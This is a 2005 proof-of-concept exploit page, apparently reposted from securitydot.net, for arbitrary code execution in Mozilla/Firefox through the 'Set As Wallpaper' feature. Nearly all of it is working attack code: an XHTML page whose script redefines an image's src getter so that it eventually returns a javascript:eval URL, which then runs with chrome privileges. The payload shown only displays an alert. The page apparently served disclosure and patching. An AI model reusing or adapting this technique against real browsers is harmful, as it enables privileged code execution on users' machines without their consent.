Rated as : Critical
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image:
url("http://www.mozilla.org/images/mozilla-16.png");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA
AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL
M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL
AAAAABJRU5ErkJggg==");
}
</style>
</head>
<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
<pre>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.
A dialog that shows Components.stack will appear.
</pre>
<IMG id="i"/>
<script>
<![CDATA[
var sx = navigator.productSub < 20050622 ? 2 : 4;
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var u = [ "http://www.mozilla.org/images/mozilla-16.png",
"javascript:eval('" + evalCode + "')" ];
var sc = 0;
var i = document.getElementById("i");
i.addEventListener("contextmenu", function(e) { sc = 0; },
false);
i.__defineGetter__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>
</body>
</html>
securitydot.net - 2005-07-12
|
